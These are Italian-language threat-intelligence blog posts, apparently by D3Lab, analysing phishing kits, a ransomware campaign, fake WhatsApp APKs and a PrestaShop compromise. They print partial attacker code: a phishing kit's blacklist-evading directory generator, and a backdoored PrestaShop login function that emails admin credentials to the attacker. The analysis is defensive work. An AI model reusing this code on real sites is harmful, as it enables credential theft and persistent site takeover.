L’activité de monitorage au niveau international a permis au D3Lab de relever de nombreuses attaques de phishing aux dépens d’Orange S.A., la plus grande société de télécommunications française opérant dans le domaine de la téléphonie mobile fixe et comme fournisseur d’accès Internet, une des principales entreprises mondiale dans ce secteur.
On relève une augmentation considérable des attaques gérées depuis 2014, notamment cette année, où on compte 412 cas avérés jusqu’à aujourd’hui.
L’attività di monitoraggio a livello internazionale ha consentito a D3Lab di rilevare numerosi attacchi di phishing a danno di Orange S.A., la maggior società di telecomunicazioni francese operante nel campo della telefonia mobile, fissa e quale internet service provider, una delle principali aziende mondali del settore.
Gli attacchi gestiti dal 2014 rilevano un notevole incremento soprattutto quest’anno con 412 casi acquisiti sino ad oggi.
Il Banco Santander è un gruppo bancario di origine spagnola operante principalmente in Spagna ed in Sud America. Tale gruppo risulta tuttavia operante anche in altri paesi europei come Germania ed Italia dove è presente come Santander Consumer Bank (per essere precisi in Germania come Santander Consumer Bank AG).
Durante la notte, svolgendo l’analisi di un caso di phishing a danno di clienti D3Lab abbiamo individuato sul medesimo host, realizzati con le medesime modalità, altri due siti clone relativi a Banca Popolare di Spoleto (Phishing ai danni della Banca Popolare di Spoleto) ed a Santander Consumer Bank, ramo italiano del gruppo spagnolo.
si tratta in entrambi i casi di enti che in base ai rilievi D3Lab non erano ancora stati aggrediti dai criminali, almeno non in tempi recenti.
La modalità con cui l’attacco è strutturato è piuttosto insidiosa in quanto consente ai criminali, sfruttando il tag meta del codice html, di visualizzare nella barra degli indirizzi del browser un url
posticcio, che può essere fatto coincidere con l’effettivo url del portale di internet banking dell’istituto al fine di potenziare l’inganno ai danno delle potenziali vittime che potrebbero non far caso alla dicitura data:text/html: che precede l’indicazione del corretto protocollo https o http nel caso di uso di frame da parte degli istituti.
Lo screenshot di apertura, che evidenzia con colori questa particolarità del testo visibile nella barra degli indirizzi, mostra come i criminali siano interessati ai dati di accesso all’account di internet banking: nella prima pagina fraudolenta infatti richiedono il codice utente, lo user name, ed i caratteri 1, 2, 5, 7 e 10 della password. Inviati tali dati a pagine php residenti in altro host compromesso gli uetenti visualizzano una seconda pagina fraudolenta in cui oltre al
codice utente (già richiestogli) devo inserire i caratteri 3, 4, 6,8 e 9 della password, asteriscati nella prima richiesta, fornendo così ai criminali, con questo secondo inserimento di dati, tutti e 10 i caratteri della password.
Non ci è dato sapere se tali informazioni siano sufficienti ai criminali per disporre operazioni, ma anche non lo fossero il solo fatto che abbiano investito tempo e risorse nella realizzazione del kit lascerebbe ipotizzare che grazie alle informazioni che potrebbero carpire dall’account utente sia per loro possibile avviare per passi successivi ulteriori azioni fraudolente, magari con contatti telefonici nei confronti delle vittime.
Si raccomanda agli utenti la massima attenzione.
Durante l’analisi notturna abbiamo individuato un nuovo ente coinvolto nel Phishing, la Banca Popolare di Spoleto appartenente al Gruppo Banco Desio è un nuovo target per i Phisher e per i relativi cliente della banca.
Il kit sfrutta la codifica base64 per offuscare il sito internet utilizzato per diffondere il Phishing, l’utente riceve una eMail contenete uno short-link che rimanda ad una pagina PHP caricata su un sito compromesso tale pagina inoltrerà nuovamente l’utente ad una pagina locale generata sfruttando la capacità dei recenti browser di visualizzare e decodificare una pagina html in base64. Come è possibile notare nell’immagine di apertura nella barra dell’indirizzo non è presente un normale URL ma una porzione della stringa che genera la pagina HTML locale, per offuscare ulteriormente il tentativo di Phishing la stringa riporta inizialmente https://ihb2.cedaci.it/… che è effettivamente il sito legittimo del homebanking.
Invitiamo come di consueto gli utenti alla massima attenzione quando ricevono eMail di richiesta convalida credenziali.
L’Infografica in apertura riepiloga quanto rilevato durante il monitoraggio quotidiano della diffusione del Phishing e Malware, in data 6 Settembre 2016 è avvenuto un tentativo di diffusione malware sfruttando un legittimo account eMail dell’Istituto Poligrafico e Zecca dello Stato e i suoi server mail. L’eMail richiedeva all’utente il pagamento di una fattura arretrata indicando che poteva visualizzare tutti i dettagli nel file allegato.
Fortunatamente è intervenuto il server eMail della Zecca dello Stato che ha rilevato l’invio di un contenuto malevolo, procedendo quindi a “troncare” l’archivio impedendo la diffusione del file Roma-Consulting.wsf che probabilmente avrebbe effettuato il download di un eseguibile ed eseguito. Nonostante il vano tentativo, gli aggressori potrebbero cambiare il metodo di diffusione per aggirare i controlli del server eMail; basti pensare alla richiesta di visitare un sito internet contenente un eseguibile (per esempio abbiamo visto sfruttare questa tecnica ai danni di GLS) piuttosto che allegarlo.
La nostra attenzione è ricaduta sul server sfruttato per inviare l’eMail, falsificare il mittente di una eMail è notoriamente facile ma se la mail e il server mittente coincide con il dominio della mail vi sono soltanto due possibili spiegazioni. Hanno violato il server o hanno violato l’account. Dal medesimo server eMail non abbiamo ricevuto nessun altro genere di comunicazione malevola (phishing, spam, ecc) e pertanto la nostra attenzione si è soffermata sulla seconda ipotesi.
Nascono ora due distinte possibilità di attacco, la vittima è stata infettata da un Trojan che ha provveduto ad inviare le Mail a sua insaputa o a diffondere la password del suo account. Oppure l’utente ha sfruttato la stessa password dell’account aziendale anche per altri servizi. Negli ultimi mesi nel Deep Web, ma non solo, si stanno diffondendo importanti archivi di password e account provenienti dai più noti portali online, Linkedin è probabilmente l’esempio più lampante ma non scordiamoci di DropBox, Trenitalia, Badoo, MySpace e mentre scriviamo questo articolo anche la più utilizzata eMail Italiana, Libero, ha comunicato che il suo database è stato violato.
Abbiamo verificato nel Database di Linkedin e come è possibile visualizzare dall’Infografia la casella eMail sfruttata per inviare il malware è presente e anche la sua relativa password, oltre ad essa sono presenti altre 46 caselle della Zecca dello Stato.
È quindi possibile che l’utente in questione sfrutti la medesima password per accedere alla Casella di Posta Elettronica della Zecca dello Stato sia su Linkedin, gli attaccanti hanno sfruttato questa debolezza per inviare diverse eMail da un mail server autorevole.
Negli ultimi giorni sono state inviate diverse eMail che avvisano l’utente nella presenza di una attività sospetta sul proprio account Microsoft, precisando che è stato eseguito un accesso il giorno 4 Settembre alle ore 12:37 GMT dalla Francia e da un utente avente l’indirizzo IP 6.2.794.8. Infine l’utente viene avvisato di controllare i propri ultimi accessi e se non riconosce l’accesso dalla Francia di aprire il documento allegato per ottenere informazioni in merito.
Il file allegato in formato ZIP viene generato con un nome casuale, ma al suo interno contiene un altro ZIP denominato 28781.zip che a sua volta contiene il file JavaScript 28781.jse. Quest’ultimo file ha il compito di effettuare il download del malware ed eseguirlo.
A prima vista è possibile determinare due errori nella stesura della eMail che chiaramente confermano la finta comunicazione. Innanzitutto il giorno 4 Settembre 2016 non era un Sabato come riportato nell’abbreviazione Inglese ma una domenica e quindi la corretta dicitura doveva essere “Sun, 04 Sep 2016…” inoltre l’indirizzo IP riportato non corrisponde allo standard per il protocollo IPv4. Un indirizzo IPv4 è composto da 4 numeri, ciascuno tra 0 e 255 mentre nella eMail è indicato il numero 794.
Infine la comunicazione arriva da un account Gmail (Google) che non ha certamente niente a che vedere con Microsoft, essendo due aziende concorrenti.
Il file JavaScript allegato avviandolo esegue il download del virus attraverso il dominio zapodewac.top tale sito è stato registrato in data 31 Agosto 2016 da Dudenkov Denis residente nella città russa Vladivostok. Un estratto del whois:
Domain Name: zapodewac.top
Domain ID: D20160831G10001G_78656334-TOP
WHOIS Server: www.eranet.com
Referral URL: http://www.eranet.com
Updated Date: 2016-08-31T15:41:49Z
Creation Date: 2016-08-31T15:30:05Z
Registry Expiry Date: 2017-08-31T15:30:05Z
Sponsoring Registrar: Eranet International Limited
Sponsoring Registrar IANA ID: 1868
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registrant ID: tod-706245
Registrant Name: Dudenkov Denis
Registrant Organization: Denis Dudenkov
Registrant Street: Lenina 18
Registrant City: Vladivostok
Registrant State/Province: RU
Registrant Postal Code: 690109
Registrant Country: RU
Registrant Phone: +86.79242368995
Registrant Phone Ext:
Registrant Fax: +86.79242368995
Registrant Fax Ext:
Registrant Email: [email protected]
Continuando l’analisi del dominio rileviamo la presenza di diversi file che riconducono la presenza di un possibile pannello di controllo:
Accedendo ai cinque diversi file PHP non si ottiene alcuna risposta, probabilmente per attivare le pagine bisogna passarli tramite chiamata GET o POST una password. È un metodo comunemente sfruttato per “nascondere” le web-shell o i mailer per inviare Phishing.
È probabile che il file admin.php permetta al criminale di accedere ad un proprio pannello di amministrazione, il file allert.php come spesso vediamo nel mondo del Phishing di avvisare l’attaccante della presenza di una nuova vittima, il file log.php di memorizzare i log di accesso, il report.php di generare report sugli accessi e relative informazioni sugli utenti e infine il file support.php che probabilmente permette di personalizzare la procedura di decifrazione per l’utente. Infine la presenza di PHPMyAdmin fa pensare che viene usato un database SQL per memorizzare i dati raccolti.
Effettuato il download del file eseguibile lo script JavaScript procede ad eseguirlo, esecuzione che cifrerà tutti i file presenti sulla Home Directory dell’utente impedendogli l’accesso salvo il pagamento di un riscatto pari a 1Bitcoin se l’acquisto viene fatto entro 5 giorni alternativamente il prezzo salirà a 2 Bitcoin. Al cambio odierno 1 Bitcoin corrisponde a quasi 550euro.
Il Ransomware a conferma che la decifrazione dei dati sia possibile permette di decifrare gratuitamente un file a propria scelta, della dimensione massima di 3Mb. Eseguendo tale procedura l’utente sceglierà il file da caricare e il sistema restituirà un archivio zippato contenente il file decifrato.
Al momento della stesura dell’articolo, ovvero dopo 3 giorni dalla diffusione del malware, solo il 30% degli antivirus commerciali riconoscono la minaccia secondo il report di VirusTotal.
Concludiamo con una galleria di screenshot del Malware in esecuzione su una nostra macchina di laboratorio.
Invitiamo gli utenti alla massima attenzione prima di aprire ogni allegato presente in una eMail.
L’attività di monitoraggio D3Lab ha consentito di individuare un tentativo di frode volto a colpire i clienti di CartaSi attraverso un messaggio di posta elettronica, con il quale l’utente viene invitato ad aggiornare i dati della carta di credito per motivi di sicurezza.
Un gruppo di criminali informatici in queste ore sta inviando centinaia di eMail ai danni della compagnia aerea Alitalia: l’utente viene avvisato che in cambio della compilazione di un questionario di gradimento dei servizi offerti dalla compagnia riceverà un rimborso di 80 €. Il promesso rimborso verrà accreditato sulla Carta di Credito del cliente, pertanto concluso il questionario vengono richieste le informazioni personali della vittima, il numero della carta di credito, la data di scadenza, il CVV e il SecureCode.
I dati forniti verranno sfruttati per effettuare acquisti o prelievi di denaro ai danni della vittima, non certamente per emettergli l’atteso rimborso.
Il kit costruito dai Phisher genera ad ogni accesso una nuova cartella casuale, generando da prima un numero casuale tra 0 e 100000, successivamente viene generato Hash MD5 di tale numero e infine codificato in base64. Un esempio della funzione sfruttata dai Phisher:
$random=rand(0,100000);
$md5=md5("$random");
$base=base64_encode($md5);
$dst=md5("$base");
function recurse_copy($src,$dst) {
...
...
Una volta generata la directory casuale all’interno di essa viene copiato il Kit di Phishing che la vittima visualizzerà. Questa tecnica è utile per eludere le BlackList e quindi l’avviso all’utente che sta visitando una possibile pagina fraudolenta poichè l’URL varierà ad ogni accesso.
Concludiamo con una galleria fotografica delle pagine di Phishing ai danni di Alitalia.
Un costante monitoraggio della rete da parte di D3lab rileva come giornalmente vengano creati nuovi nomi di dominio spesso ingannevoli e che fanno riferimento a noti servizi internet quali ad esempio, PayPal
ma anche alla nota applicazione di messaggistica istantanea multipiattaforma per smartphone, Whatsapp
In dettaglio ecco un novo dominio, dal nome ingannevole, che appare registrato da poche ore,
e che mostra l’attuale hosting su IP USA
La pagina di download della fake applicazione Whatsapp presenta un layout ottimizzato per dispositivi mobili
Una volta cliccato sul pulsante download, viene scaricato un file apk che una analisi Virus Total mostra avere contenuti malware
Sempre sul medesimo sito e’ possibile trovare pagine di download di altre note applicazioni Android, in realtà falsi apk dai contenuti maevoli.
Il consiglio rimane quindi sempre quello di evitare di scaricare applicazioni da siti poco conosciuti e di dubbia affidabilità, provvedendo inoltre, prima di installare il software, ad una scansione con servizi Internet di verifica dei contenuti, come ad esempio Virus Total, ricordando comunque che nel caso di nuovo malware o varianti di codici noti, anche la scansione online, potrebbe, specialmente nelle prime ore di distribuzione del codice malevolo, far apparire il file come legittimo e senza problemi.
Durante l’analisi di un attacco di Phishing ai danni di un nostro cliente, con il supporto dell’amministratore del sito attaccato, abbiamo analizato come gli attaccanti abbiano alterato il Pannello di Amministratore di PrestaShop per inviare le credenziali dell’Admin via eMail.
Nel corso dell’ultimo trimestre cinque moduli esterni nel CMS PrestaShop sono risultati vulnerabili ad un attacco di tipo Remote Arbitrary File Upload, attacco che permette di caricare file di proprio piacimento sul sito internet vulnerabile.
Gli exploit, non diffusi attraverso i canonici canali dell’IT Security, permettono di sfruttare la vulnerabilità sui seguenti moduli:
Analizzando il backup che ci è stato cortesemente fornito dall’amministratore del sito compromesso abbiamo rilevato non solo la presenza di diverse web shell protette da password o meno ma la nostra attenzione è ricaduta sull’alterazione del pannello di amministratore.
L’alterazione ha lo scopo di fornire all’attaccante le credenziali del pannello di amministrazione, un efficace sistema per preservare l’accesso al sito, anche dopo una eventuale bonifica delle shell presenti nel sito, aggiornamento dei moduli vulnerabili o un comune cambio password.
Come avviene questa compromissione?
L’attaccante sfrutta uno dei moduli vulnerabili per caricare uno o più file PHP sul sito internet, quello di nostro interesse si chiama do.php esso è suddiviso in due parte. La prima parte esegue l’alterazione del pannello di amministratore, la seconda invece è un semplice uploader per caricare ulteriore materiale sul sito senza sfruttare le vulnerabilità dei moduli.
La nostra attenzione ricade sulla prima parte del file, ovvero:
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach($sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach($p1 as $path){
if (file_exists("$path")){
$html = @file_get_contents('http://pastebin.com/raw/XXXXXXXX');
$save=fopen($path,'w');
fwrite($save,$html);
echo "
./done panel
";
}
}
}
...
...
Questa porzione di codice individua inizialmente la presenza del file AdminLoginController.php, se presente lo sostituisce con il codice PHP pubblicato su PasteBin, il codice pubblicato sul famoso portale riprende integralmente il file originale di PrestaShop ma altera la funzione di verifica delle credenziali:
public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
if (empty($email)) {
$this->errors[] = Tools::displayError('Email is empty.');
} elseif (!Validate::isEmail($email)) {
$this->errors[] = Tools::displayError('Invalid email address.');
}
if (empty($passwd)) {
$this->errors[] = Tools::displayError('The password field is blank.');
} elseif (!Validate::isPasswd($passwd)) {
$this->errors[] = Tools::displayError('Invalid password.');
}
...
...
La funzione processLogin() ha normalmente il compito di verificare se le credenziali inserite sono corrette, ma attraverso questa alterazione l’attaccante riceverà via eMail le credenziali inserite dall’amministratore.